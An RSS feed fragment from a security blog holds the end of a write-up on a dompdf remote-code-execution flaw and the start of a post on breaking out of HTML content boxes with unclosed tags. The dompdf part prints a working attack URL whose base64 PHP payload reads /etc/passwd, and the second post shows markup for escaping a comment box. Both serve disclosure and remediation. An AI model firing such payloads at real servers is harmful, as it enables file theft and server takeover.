&lt;span class=&quot;x&quot;&gt;* If this setting is set to true then DOMPDF will automatically evaluate&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;* inline PHP contained within &amp;lt;script type=&amp;quot;text/php&amp;quot;&amp;gt; ... &amp;lt;/script&amp;gt; tags.&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;*&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;* Attention!&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;* Enabling this for documents you do not trust (e.g. arbitrary remote html&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;* pages) is a security risk. Inline scripts are run with the same level of&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;* system access available to dompdf. Set this option to false (recommended)&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;* if you wish to process untrusted documents.&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;*&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;* @var bool&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;*/&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;def(&amp;quot;DOMPDF_ENABLE_PHP&amp;quot;, false);&lt;/span&gt;

&lt;span class=&quot;x&quot;&gt;/**&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * Enable remote file access&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; *&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * If this setting is set to true, DOMPDF will access remote sites for&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * images and CSS files as required.&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * This is required for part of test case www/test/image_variants.html through www/examples.php&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; *&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * Attention!&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * This can be a security risk, in particular in combination with DOMPDF_ENABLE_PHP and&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * allowing remote access to dompdf.php or on allowing remote html code to be passed to&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * $dompdf = new DOMPDF(); $dompdf-&amp;gt;load_html(...);&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * This allows anonymous users to download legally doubtful internet content which on&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * tracing back appears to being downloaded by your server, or allows malicious php code&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * in remote html pages to be executed by your server with your account privileges.&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; *&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; * @var bool&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt; */&lt;/span&gt;
&lt;span class=&quot;x&quot;&gt;def(&amp;quot;DOMPDF_ENABLE_REMOTE&amp;quot;, false);&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Reading that I wonder &lt;strong&gt;why people would activate these settings&lt;/strong&gt; ? In fact the
&lt;em&gt;&lt;code&gt;enable_remote&lt;/code&gt;&lt;/em&gt; is the easiest way to have images in your PDF, if you have
absolute domains uri for images you will need to enable this option to have
dompdf fetch the image and render it.&lt;/p&gt;

&lt;p&gt;The &lt;em&gt;&lt;code&gt;enable_php&lt;/code&gt;&lt;/em&gt; part is worst, it is a way of defining PDF specific tasks in a
php script, using an HTML template. with some provided variables like &lt;code&gt;$pdf&lt;/code&gt;,
&lt;code&gt;$PAGE_NUM&lt;/code&gt; and &lt;code&gt;$PAGE_COUNT&lt;/code&gt;. The new versions use css markup for such tasks.
Using a PHP eval to run this sort of task was a bad idea. It leads to a real call to
&lt;code&gt;eval()&lt;/code&gt; in the code, that we will exploit.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;dompdf.php&lt;/code&gt; script can render a pdf, the &lt;em&gt;input_file&lt;/em&gt; parameter could be a file,
but also a protocol. Anything detected as a remote protocol will only be available
in &lt;em&gt;enable_remote&lt;/em&gt; mode.&lt;/p&gt;

&lt;p&gt;The previous security issue used the &lt;code&gt;php://&lt;/code&gt; protocol, which was then filtered.&lt;/p&gt;

&lt;p&gt;The &lt;code&gt;data://&lt;/code&gt; protocol is not blocked and is sometime used to embed images in the
PDF by giving the full encoded image as a data uri parameter.&lt;/p&gt;

&lt;p&gt;The old trick for dompdf images was using HTML sources in this form:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;&lt;span class=&quot;nt&quot;&gt;&amp;lt;img&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;src=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;data:image/jpeg;base64,HERE_SOME_BASE64_ENCODED_BINARY_THINGS&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Using &lt;strong&gt;data&lt;/strong&gt; to embed images in the PDF is a nice hack, if you have never seen a
data-uri image check github&#39;s 404 pages HTML sources.&lt;/p&gt;

&lt;p&gt;But the &lt;a href=&quot;https://developer.mozilla.org/fr/docs/Web/HTTP/Basics_of_HTTP/Data_URIs&quot;&gt;data-uri&lt;/a&gt; protocol is not limited to images support.
It can embed any mime document. A php script for example is a document with
mime type &lt;code&gt;application/x-httpd-php&lt;/code&gt; (you could also try XML files for XXE issues).&lt;/p&gt;

&lt;p&gt;Let&#39;s say I have this small PHP script:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;&lt;span class=&quot;cp&quot;&gt;&amp;lt;?php&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;&amp;#39;PHP RCE : &amp;#39;&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;phpversion&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;();&lt;/span&gt;
&lt;span class=&quot;k&quot;&gt;echo&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&amp;quot;bye&amp;quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;cp&quot;&gt;?&amp;gt;&lt;/span&gt;&lt;span class=&quot;x&quot;&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Note that I could do some other things in PHP, that&#39;s just an example.&lt;/p&gt;

&lt;p&gt;In a data URI source this same PHP script content can be written like that (base64 encoding is just a way of rewritting something in ascii-7):&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;data:application/x-httpd-php;charset=utf-8;base64,PD9waHANCmVjaG8gJ1BIUCBSQ0UgOiAnIC4gcGhwdmVyc2lvbigpOw0KZWNobyAiYnllIjsNCj8+&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;With some url encoding (because we&#39;ll use that on an url) that is:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;data%3Aapplication%2Fx-httpd-php%3Bcharset%3Dutf-8%3Bbase64%2CPD9waHANCmVjaG8gJ1BIUCBSQ0UgOiAnIC4gcGhwdmVyc2lvbigpOw0KZWNobyAiYnllIjsNCj8%2B&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And the final attack is:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;http://&lt;span class=&quot;nt&quot;&gt;&amp;lt;target&amp;gt;&lt;/span&gt;/&lt;span class=&quot;nt&quot;&gt;&amp;lt;path&amp;gt;&lt;/span&gt;/dompdf/dompdf.php?base_path=&lt;span class=&quot;err&quot;&gt;&amp;amp;&lt;/span&gt;options[Attachment]=0&lt;span class=&quot;err&quot;&gt;&amp;amp;&lt;/span&gt;input_file=data%3Aapplication%2Fx-httpd-php%3Bcharset%3Dutf-8%3Bbase64%2CPD9waHANCmluY2x1ZGUgKCcvZXRjL3Bhc3N3ZCcpOw0KZWNobyAiYnllIjsNCj8%2B&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;If default settings for &lt;code&gt;DOMPDF_ENABLE_PHP&lt;/code&gt; and &lt;code&gt;DOMPDF_ENABLE_REMOTE&lt;/code&gt; are
altered (to true) this attack will successfully run the PHP script and render
the output of this script to a PDF document (which is in fact only an optionnal side-effect).
This Can be used for local or remote
file inclusion, but also to edit or create a php file, run a shell script, etc.
Chances are this exploit would be used to connect your server in a botnet.&lt;/p&gt;

&lt;h2&gt;Last words&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Avoid using &lt;code&gt;eval()&lt;/code&gt; in your web code&lt;/li&gt;
&lt;li&gt;Avoid adding demonstrations to your libraries, or ensure that they will not
run in production&lt;/li&gt;
&lt;li&gt;Update your dompdf installation. Version 0.7 is a revolution, it may be hard
to switch to that version, but moving an old 0.6.0 or 0.6.1 version to 0.6.2
should be straightforward, if it breaks something revert the code and check next
point.&lt;/li&gt;
&lt;li&gt;if you use dompdf in a cms, you can safely &lt;strong&gt;remove the &lt;code&gt;www&lt;/code&gt; subdirectory
and the &lt;code&gt;dompdf.php&lt;/code&gt; file&lt;/strong&gt; in that library, rename it first if you do not
believe me, the CMS is quite certainly using the library classes, and not the
demonstration code and runner.&lt;/li&gt;
&lt;li&gt;if you enabled the two dangerous settings, then revert it even if it breaks
something (choose between breaking a features and giving your server to spammers)&lt;/li&gt;
&lt;li&gt;if you use a modern PHP application, please put PHP libraries outside of the
web document root.&lt;/li&gt;
&lt;/ul&gt;

</description>
				<published>2016-12-19 00:00:00 +0100</published>
				<link>http://regilero.github.io/english/security/2016/12/19/security_dompdf_rce/</link>
			</item>
		
			<item>
				<title>Web Security, using bad HTML to escape from a DIV</title>
				<description>&lt;p&gt;&lt;small&gt;&lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; disponible sur &lt;a href=&quot;http://www.makina-corpus.com/blog/metier/2016/securite-web-utiliser-du-mauvais-html-pour-sevader-dun-div-1&quot;&gt;makina corpus&lt;/a&gt;).&lt;/small&gt;
&lt;small&gt;estimated read time: 10min&lt;/small&gt;&lt;/p&gt;

&lt;h2&gt;Why?&lt;/h2&gt;

&lt;p&gt;Have you ever wondered why you cannot post any HTML on Facebook? It seems so
easy on a lot of websites to submit content containing a small HTML subset, why doesn&#39;t Facebook allow it?&lt;/p&gt;

&lt;p&gt;Or maybe you knew that it was possible in Facebook Notes, before April 2014. You
had a little rich text editor where you could type in some HTML tags (both in
wysiwyg and raw mode). But you cannot do that anymore. Now you are forced to use the
wysiwyg mode and even using the API you will see that the very small part of
HTML you can use will always be very very clean. Very few nested levels,
very strict opening/closing policy for tags, no attributes, etc.&lt;/p&gt;

&lt;p&gt;Well, in this article I&#39;ll try to explain why. I&#39;ll show you how, by simply
playing with &lt;strong&gt;bad HTML syntax&lt;/strong&gt; on a very small subset of HTML, it is easy
for contributed HTML to &lt;strong&gt;evade the box&lt;/strong&gt; and write everywhere on the page.&lt;/p&gt;

&lt;p&gt;This earned me a 1500 USD facebook bounty (and a Github T-shirt). So, yes, it&#39;s very
simple but it&#39;s still very annoying and real.&lt;/p&gt;

&lt;p&gt;I like to look at &lt;strong&gt;very simple things&lt;/strong&gt; and HTML box evasion is something very
very simple. So simple that most people would not even see why it is a problem.&lt;/p&gt;

&lt;p&gt;So, before reading, keep in mind that this is about HTML contributions and HTML injection, this is
not about XSS or SQL injection. The problem here is:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Can you let the user contribute content formatted with a small subset of HTML?&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Can you ensure the contributed content will stay &lt;em&gt;in the box&lt;/em&gt;, in the dedicated layout subset.&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;This impacts every markup language that is rendered to HTML (like
partial HTML, of course, but also markdown, reStructuredText, etc.).&lt;/p&gt;

&lt;h2&gt;So what?&lt;/h2&gt;

&lt;h3&gt;Implicit HTML and the browser fixing your errors&lt;/h3&gt;

&lt;p&gt;When you feed a browser with some HTML, the browser is very kind and will try to
fix a big number of errors that could be present in the page.&lt;/p&gt;

&lt;p&gt;This behavior was a very important part of the web&#39;s success. If browsers made a
&lt;em&gt;White-Page-Of-Death&lt;/em&gt; for every HTML syntax error, the web would be really
smaller.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This is cool for the end user.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This is cool for the web developer.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;This is bad in terms of security.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;One of the way browsers will fix HTML is by adding closing tags when the
page clearly forgot to close some tags.&lt;/p&gt;

&lt;p&gt;So this:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;&lt;span class=&quot;c&quot;&gt;&amp;lt;!-- initial --&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;foo&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;ul&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;foo
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;bar
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Is automatically rewritten with closing &lt;code&gt;&amp;lt;/LI&amp;gt;&lt;/code&gt;:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;&lt;span class=&quot;c&quot;&gt;&amp;lt;!-- rendered --&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;foo&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;ul&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;foo&lt;span class=&quot;nt&quot;&gt;&amp;lt;/LI&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;bar&lt;span class=&quot;nt&quot;&gt;&amp;lt;/LI&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;But let&#39;s look at something nastier, we have an opening &lt;code&gt;&amp;lt;DIV&amp;gt;&lt;/code&gt; inside the &lt;code&gt;&amp;lt;LI&amp;gt;&lt;/code&gt;:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;&lt;span class=&quot;c&quot;&gt;&amp;lt;!-- initial --&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;foo&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;ul&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;foo
          &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;second&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
             test
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;bar&lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;The browser will add the closing DIV:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;&lt;span class=&quot;c&quot;&gt;&amp;lt;!-- rendered --&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;foo&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;ul&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;foo
          &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;second&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
            test
          &lt;span class=&quot;nt&quot;&gt;&amp;lt;/DIV&amp;gt;&lt;/span&gt;  &lt;span class=&quot;c&quot;&gt;&amp;lt;!-- implicit HTML --&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;bar&lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Chances are that a &lt;strong&gt;server side output filter&lt;/strong&gt;, filtering HTML contributions
would have &lt;strong&gt;detected&lt;/strong&gt; this HTML as invalid, if you &lt;strong&gt;count opening and closing
tags&lt;/strong&gt; you can detect that a closing tag is missing.&lt;/p&gt;

&lt;p&gt;So our bad contributor will instead write this:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;&lt;span class=&quot;c&quot;&gt;&amp;lt;!-- initial --&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;foo&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;ul&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;foo&lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;second&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;third&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;test&lt;span class=&quot;nt&quot;&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;bar&lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt; &lt;span class=&quot;c&quot;&gt;&amp;lt;!-- end third --&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt; &lt;span class=&quot;c&quot;&gt;&amp;lt;!-- end second --&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;And &lt;strong&gt;if you count&lt;/strong&gt; the number of closing and opening tags, or if you try to
cleanup this with some regexp (are you crazy?), chances are that this will look
good.&lt;/p&gt;

&lt;p&gt;And now the browser result:&lt;/p&gt;

&lt;div class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-html&quot; data-lang=&quot;html&quot;&gt;&lt;span class=&quot;c&quot;&gt;&amp;lt;!-- rendered --&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;foo&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;ul&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;foo
           &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;second&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;
            &lt;span class=&quot;nt&quot;&gt;&amp;lt;div&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;class=&lt;/span&gt;&lt;span class=&quot;s&quot;&gt;&amp;quot;third&amp;quot;&lt;/span&gt;&lt;span class=&quot;nt&quot;&gt;&amp;gt;&lt;/span&gt;test
            &lt;span class=&quot;nt&quot;&gt;&amp;lt;/DIV&amp;gt;&lt;/span&gt; &lt;span class=&quot;c&quot;&gt;&amp;lt;!-- implicit HTML - end third--&amp;gt;&lt;/span&gt;
           &lt;span class=&quot;nt&quot;&gt;&amp;lt;/DIV&amp;gt;&lt;/span&gt; &lt;span class=&quot;c&quot;&gt;&amp;lt;!-- implicit HTML - end second --&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;/li&amp;gt;&lt;/span&gt;
        &lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;bar&lt;span class=&quot;nt&quot;&gt;&amp;lt;li&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/ul&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt; &lt;span class=&quot;c&quot;&gt;&amp;lt;!-- end third? no, end foo --&amp;gt;&lt;/span&gt;
      &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt; &lt;span class=&quot;c&quot;&gt;&amp;lt;!-- end second? no end foo&amp;#39;s parent if any --&amp;gt;&lt;/span&gt;
    &lt;span class=&quot;nt&quot;&gt;&amp;lt;/div&amp;gt;&lt;/span&gt; &lt;span class=&quot;c&quot;&gt;&amp;lt;!-- end foo&amp;#39;s parent&amp;#39;s parent if any --&amp;gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;


&lt;p&gt;Two &lt;code&gt;&amp;lt;/DIV&amp;gt;&lt;/code&gt; are &lt;strong&gt;impliclty added by the browser&lt;/strong&gt;, because you cannot close
the &lt;code&gt;&amp;lt;LI&amp;gt;&lt;/code&gt; without closing the &lt;code&gt;&amp;lt;DIV&amp;gt;&lt;/code&gt; inside. And now, on the final page, you have
2 extras closing divs !&lt;/p&gt;

&lt;h3&gt;Ok, too many closing divs, and then?&lt;/h3&gt;

&lt;p&gt;If the contributor can enter &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; and &lt;code&gt;&amp;lt;/div&amp;gt;&lt;/code&gt;, and if you count the number
of closing and opening divs to assume the HTML is correct, &lt;strong&gt;you are wrong&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;The HTML is correct only if &lt;strong&gt;the order&lt;/strong&gt; of the opening and closing tags is
correct, if some tags are closed before some others it may break the layout
(it depends of the tags).&lt;/p&gt;

&lt;p&gt;For the contibutors, this means writing outside of the controlled zone (the
user-comment box for example) and adding content, with the subset of HTML that
they are allowed to use, on other parts of the page, maybe playing with &lt;code&gt;&amp;lt;table&amp;gt;&lt;/code&gt;
and &lt;code&gt;&amp;lt;br/&amp;gt;&lt;/code&gt; to fake content on some parts of your layout that other users will
trust more than a spam comment box (see last examples at the end of this text).&lt;/p&gt;

&lt;h2&gt;Demo&lt;/h2&gt;

&lt;p&gt;Below are some iframes that use the implicit DIV closing trick to write one
simple line of text on the &lt;code&gt;main&lt;/code&gt; div, instead of writing it 3 nested DIV
deeper.&lt;/p&gt;

&lt;p&gt;An interesting thing to do is opening these iframes in a new window and looking
at the source. Here is what you&#39;ll see if you view the source of the first iframe:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/theme/img/posts/t1_html_source.png&quot;&gt;&lt;/p&gt;

&lt;p&gt;We can see that something wrong was detected and highlighted in red.&lt;/p&gt;

&lt;p&gt;Inspecting the DOM we see how the browser automatcially closes the divs:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/theme/img/posts/t1_html_dom.png&quot;&gt;&lt;/p&gt;

&lt;p&gt;In these examples:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;the goal is to write something &lt;strong&gt;in red&lt;/strong&gt;, in the main div&lt;/li&gt;
&lt;li&gt;somes tests should fail (using &lt;code&gt;&amp;lt;P&amp;gt;&lt;/code&gt; or &lt;code&gt;&amp;lt;TD&amp;gt;&lt;/code&gt; &lt;code&gt;&amp;lt;TR&amp;gt;&lt;/code&gt; we do not break the divs
as would most inline tags like &lt;code&gt;&amp;lt;span&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;strong&amp;gt;&lt;/code&gt;, &lt;code&gt;&amp;lt;sub&amp;gt;&lt;/code&gt;, etc.)&lt;/li&gt;
&lt;/ul&gt;


&lt;table&gt;
&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t1.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t2.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t1.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t2.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t3.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t4.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t3.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t4.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;/tr&gt;
